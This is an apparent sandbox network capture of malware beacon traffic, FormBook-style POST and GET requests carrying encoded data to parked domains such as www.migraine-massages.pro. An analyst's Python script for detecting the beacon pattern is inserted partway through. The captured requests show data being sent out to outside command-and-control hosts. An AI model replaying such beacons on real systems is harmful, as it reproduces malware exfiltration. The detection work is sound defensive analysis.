Timestamp: Nov 14, 2024 15:43:33.305862904 CET | Bytes transferred: 166 | Direction: IN | Data Raw: 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c
                                                                                                                                                  Data Ascii: Listener('click', (e) => { window.location.replace(atob(e.target.dataset.url) + '4nk.education'); }); });</script></main></div> </body></html>0


Session ID: 58 | Source IP: 192.168.2.5 | Source Port: 50037 | Destination IP: 199.59.243.227 | Destination Port: 80
Timestamp: Nov 14, 2024 15:43:38.443517923 CET | Bytes transferred: 663 | Direction: OUT | Data:
POST /ym43/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  Origin: http://www.migraine-massages.pro
                                                                                                                                                  Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 59 31 4f 69 33 74 75 45 53 38 4b 73 2b 62 51 45 47 50 35 63 49 46 65 33 7a 68 37 65 51 78 35 51 41 55 69 6f 41 54 35 36 63 51 62 36 4b 75 6b 31 77 38 66 71 61 42 72 49 73 59 51 51 53 6e 68 41 79 76 53 47 55 4e 62 52 49 74 61 56 34 35 6e 70 75 66 6a 6d 6c 2b 4d 49 62 59 53 44 75 6b 6e 2b 6f 68 59 56 63 63 2f 54 54 78 34 51 39 64 6a 4a 4c 77 74 38 2b 74 54 64 33 35 61 79 53 61 48 75 61 79 52 77 37 79 54 71 37 4d 36 51 38 52 4a 52 73 2f 2b 43 42 6c 2b 49 79 39 4d 47 33 35 58 77 43 65 63 33 7a 56 46 43 4c 71 56 6a 44 59 65 77 56 48 6b 64 6b 73 36 58 4a 34 3d
                                                                                                                                                  Data Ascii: W638b4U=ozicw38sFOhU+Y1Oi3tuES8Ks+bQEGP5cIFe3zh7eQx5QAUioAT56cQb6Kuk1w8fqaBrIsYQQSnhAyvSGUNbRItaV45npufjml+MIbYSDukn+ohYVcc/TTx4Q9djJLwt8+tTd35aySaHuayRw7yTq7M6Q8RJRs/+CBl+Iy9MG35XwCec3zVFCLqVjDYewVHkdks6XJ4=
Timestamp: Nov 14, 2024 15:43:39.095066071 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:43:39 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1154
                                                                                                                                                  x-request-id: 2a24c07f-4e46-40d5-929a-685f072cd2d5
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                                  set-cookie: parking_session=2a24c07f-4e46-40d5-929a-685f072cd2d5; expires=Thu, 14 Nov 2024 14:58:39 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Timestamp: Nov 14, 2024 15:43:39.095204115 CET | Bytes transferred: 607 | Direction: IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmEyNGMwN2YtNGU0Ni00MGQ1LTkyOWEtNjg1ZjA3MmNkMmQ1IiwicGFnZV90aW1lIjoxNzMxNTk1ND


Session ID: 59 | Source IP: 192.168.2.5 | Source Port: 50038 | Destination IP: 199.59.243.227 | Destination Port: 80
Timestamp: Nov 14, 2024 15:43:40.988610983 CET | Bytes transferred: 683 | Direction: OUT | Data:
POST /ym43/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  Origin: http://www.migraine-massages.pro
                                                                                                                                                  Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6b 64 35 51 68 6b 69 72 45 2f 35 37 63 51 62 69 36 75 6c 37 51 38 57 71 61 4e 56 49 70 67 51 51 53 7a 68 41 33 72 53 47 43 46 59 52 59 74 59 65 59 35 70 30 65 66 6a 6d 6c 2b 4d 49 62 4e 33 44 75 63 6e 2f 62 35 59 58 39 63 77 65 7a 78 37 52 39 64 6a 44 72 77 70 38 2b 74 31 64 79 52 77 79 58 47 48 75 62 43 52 77 70 61 53 6c 37 4d 67 4e 4d 51 4e 51 2f 69 6f 48 7a 52 4c 50 6a 51 64 62 78 31 4b 78 30 76 32 74 52 64 74 52 72 47 74 7a 51 51 70 68 6c 6d 4e 48 48 38 4b 4a 65 76 67 64 44 48 4a 44 54 32 76 59 6a 4d 69 51 43 4c 71 74 47 4f 4e
                                                                                                                                                  Data Ascii: W638b4U=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+ekd5QhkirE/57cQbi6ul7Q8WqaNVIpgQQSzhA3rSGCFYRYtYeY5p0efjml+MIbN3Ducn/b5YX9cwezx7R9djDrwp8+t1dyRwyXGHubCRwpaSl7MgNMQNQ/ioHzRLPjQdbx1Kx0v2tRdtRrGtzQQphlmNHH8KJevgdDHJDT2vYjMiQCLqtGON
Timestamp: Nov 14, 2024 15:43:41.636209965 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:43:40 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1154
                                                                                                                                                  x-request-id: 68812700-9595-4db1-a7b7-1e9b8822ac8f
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                                  set-cookie: parking_session=68812700-9595-4db1-a7b7-1e9b8822ac8f; expires=Thu, 14 Nov 2024 14:58:41 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Timestamp: Nov 14, 2024 15:43:41.636749029 CET | Bytes transferred: 607 | Direction: IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjg4MTI3MDAtOTU5NS00ZGIxLWE3YjctMWU5Yjg4MjJhYzhmIiwicGFnZV90aW1lIjoxNzMxNTk1ND
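The sessions above share a shape that is easy to pivot on: every request carries the same User-Agent string, targets a single short directory (/gnvu/, /ym43/), sends one opaque base64-looking value under the same key W638b4U whether it travels in a GET query or a POST body, and the POSTs set Origin and Referer to the host they are contacting. The hosts answer with a 501 from nginx or a domain-parking page, so none of them shows a live server behind the path. The Python script below is an added example for this report, not part of the Joe Sandbox output or of the sample: it parses raw HTTP/1.1 requests, tags those traits per request, and correlates the form key across hosts, which is the cross-session signal a single request cannot give. The first two sample requests are copied from sessions 57 and 58; the third is a constructed benign control. The trait thresholds (a 3 to 6 character directory, a 32+ character base64 value) are assumptions chosen for this illustration, not documented FormBook constants.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# User-Agent carried by every request in sessions 57-60 of the capture above.
BEACON_UA = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36")
# Assumed thresholds for this illustration (not documented FormBook constants):
# one short lower-case directory, and a base64-looking value of 32+ characters.
SHORT_DIR_RE = re.compile(r"^/[a-z0-9]{3,6}/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
CRLF = "\r\n"


def split_form(encoded: str) -> dict:
    """Split k=v&k=v WITHOUT percent/plus decoding: the beacon puts raw base64
    in query and body, so '+' is data; parse_qsl would turn it into a space."""
    params = {}
    for pair in encoded.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    return params


def parse_request(raw: str) -> dict:
    """Parse one raw HTTP/1.1 request (CRLF line endings) into a dict."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = split_form(url.query)
    if method == "POST" and headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        params.update(split_form(body))
    return {"method": method, "path": url.path, "host": headers.get("host", ""),
            "headers": headers, "params": params}


def beacon_traits(req: dict) -> list:
    """List the beacon traits one request shows; an empty list means none."""
    h, traits = req["headers"], []
    if h.get("user-agent") == BEACON_UA:
        traits.append("fixed-ua")
    if SHORT_DIR_RE.match(req["path"]):
        traits.append("short-dir")
    if any(B64_RE.match(v) for v in req["params"].values()):
        traits.append("b64-blob")
    # The POSTs claim to originate from a page on the very host they contact.
    if req["method"] == "POST" and h.get("origin") == "http://" + req["host"] \
            and h.get("referer") == "http://" + req["host"] + req["path"]:
        traits.append("self-referer")
    return traits


def shared_form_keys(reqs: list) -> dict:
    """Map each query/form key seen against two or more hosts to those hosts."""
    hosts = defaultdict(set)
    for req in reqs:
        for key in req["params"]:
            hosts[key].add(req["host"])
    return {k: sorted(v) for k, v in hosts.items() if len(v) >= 2}


SAMPLE_REQUESTS = [
    # Session 57: GET beacon to www.4nk.education, copied from the capture.
    CRLF.join([
        "GET /gnvu/?W638b4U=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJX"
        "qR1fUXmtsCJ3OPXRNkZ1wk4Fjjnnxvqu9VAopw5jutgMYieatrM5Tiebl9fmqoGSNeZ5Og=="
        "&Xll=50hLc0Hhy HTTP/1.1",
        "Accept: */*", "Accept-Language: en-US,en;q=0.9", "Connection: close",
        "Host: www.4nk.education", "User-Agent: " + BEACON_UA, "", ""]),
    # Session 58: POST beacon to www.migraine-massages.pro, copied from the capture.
    CRLF.join([
        "POST /ym43/ HTTP/1.1", "Accept: */*", "Accept-Encoding: gzip, deflate",
        "Accept-Language: en-US,en;q=0.9",
        "Content-Type: application/x-www-form-urlencoded", "Content-Length: 208",
        "Cache-Control: max-age=0", "Connection: close",
        "Host: www.migraine-massages.pro", "Origin: http://www.migraine-massages.pro",
        "Referer: http://www.migraine-massages.pro/ym43/", "User-Agent: " + BEACON_UA, "",
        "W638b4U=ozicw38sFOhU+Y1Oi3tuES8Ks+bQEGP5cIFe3zh7eQx5QAUioAT56cQb6Kuk1w8fqaBrIsYQQ"
        "SnhAyvSGUNbRItaV45npufjml+MIbYSDukn+ohYVcc/TTx4Q9djJLwt8+tTd35aySaHuayRw7yTq7M6"
        "Q8RJRs/+CBl+Iy9MG35XwCec3zVFCLqVjDYewVHkdks6XJ4="]),
    # Constructed benign control request (not from the capture).
    CRLF.join([
        "GET /index.html HTTP/1.1", "Host: www.example.com",
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0",
        "Accept: text/html", "Connection: keep-alive", "", ""]),
]

if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS]
    for req in parsed:
        print(req["method"], req["host"] + req["path"], beacon_traits(req))
    print("keys reused across hosts:", shared_form_keys(parsed))
```

Two points worth keeping in mind when turning this into a production rule. The '+' and '/' bytes in the beacon value (2b and 2f in the Data Raw dumps) are literal, so a standard form decoder that maps '+' to a space will silently break the base64 check; split on '&' and '=' and leave the value alone. And the fixed User-Agent alone is weak evidence, since it is a plausible if outdated Chrome build string; the reuse of one form key across unrelated hosts that answer with parking pages is the stronger hunt signal.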


Session ID: 60 | Source IP: 192.168.2.5 | Source Port: 50039 | Destination IP: 199.59.243.227 | Destination Port: 80
Timestamp: Nov 14, 2024 15:43:43.534837961 CET | Bytes transferred: 1700 | Direction: OUT | Data:
POST /ym43/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  Origin: http://www.migraine-massages.pro
                                                                                                                                                  Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6c 4a 35 51 58 77 69 72 6c 2f 35 70 4d 51 62 72 61 75 67 37 51 39 55 71 65 70 76 49 70 6b 75 51 51 4c 68 42 52 58 53 58 48 6c 59 65 59 74 59 52 34 35 6f 70 75 65 2b 6d 6c 75 41 49 62 64 33 44 75 63 6e 2f 64 39 59 54 73 63 77 59 7a 78 34 51 39 64 56 4a 4c 77 42 38 34 45 4f 64 79 64 4b 7a 6a 4b 48 76 37 53 52 78 63 75 53 73 37 4d 2b 64 63 51 72 51 2f 76 32 48 33 78 78 50 6a 6c 4b 62 32 78 4b 39 53 4f 51 34 67 42 53 4f 71 2b 37 34 42 6f 4f 34 7a 53 71 61 42 41 59 4f 39 4c 42 65 52 4f 6d 4d 45 4b 4b 54 6e 4e 5a 4a 30 6d 39 69 68 72 68 53 4a 66 4d 77 50 47 6a 61 73 37 65 65 57 39 49 42 36 37 72 6e 76 67 33 71 4a 39 70 36 2f 47 38 68 67 4a 46 42 5a 79 79 4b 79 58 59 37 72 5a 69 74 75 4d 6b 53 56 52 6c 50 79 46 49 79 43 6c 4c 36 74 77 4e 71 73 4d 54 4d 6c 37 78 6a 6e 4a 56 72 6a 34 39 63 39 34 73 69 6a 45 6d 64 44 65 62 67 46 53 50 45 49 4c 66 73 53 59 4f 56 42 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=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 [TRUNCATED]
                                                                                                                                                   Nov 14, 2024 15:43:44.225358963 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:43:43 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1154
                                                                                                                                                  x-request-id: ca556c8f-e01a-428f-a3c5-37141bc3340d
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                                  set-cookie: parking_session=ca556c8f-e01a-428f-a3c5-37141bc3340d; expires=Thu, 14 Nov 2024 14:58:44 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                   Nov 14, 2024 15:43:44.225905895 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2E1NTZjOGYtZTAxYS00MjhmLWEzYzUtMzcxNDFiYzMzNDBkIiwicGFnZV90aW1lIjoxNzMxNTk1ND


                                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                   61 | 192.168.2.5 | 50040 | 199.59.243.227 | 80
                                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                   Nov 14, 2024 15:43:46.079344988 CET | 390 | OUT | GET /ym43/?W638b4U=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRTsdeZatTq9P8nD3DJaYsKbhsyMI+cP4BIi4vfpBrFLN6oA==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                   Nov 14, 2024 15:43:46.729651928 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:43:46 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1518
                                                                                                                                                  x-request-id: 0e19bd2f-24b5-4754-a8dd-e7bbc5038796
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hWSW/6myXdAG/dDIsV50Lsy88i4smYJL1sTsm8rM+OGq0dyjg4+2vcZGTg+243wkPTg6NkypZhQn9T0cRTp3Dg==
                                                                                                                                                  set-cookie: parking_session=0e19bd2f-24b5-4754-a8dd-e7bbc5038796; expires=Thu, 14 Nov 2024 14:58:46 GMT; path=/
                                                                                                                                                  connection: close
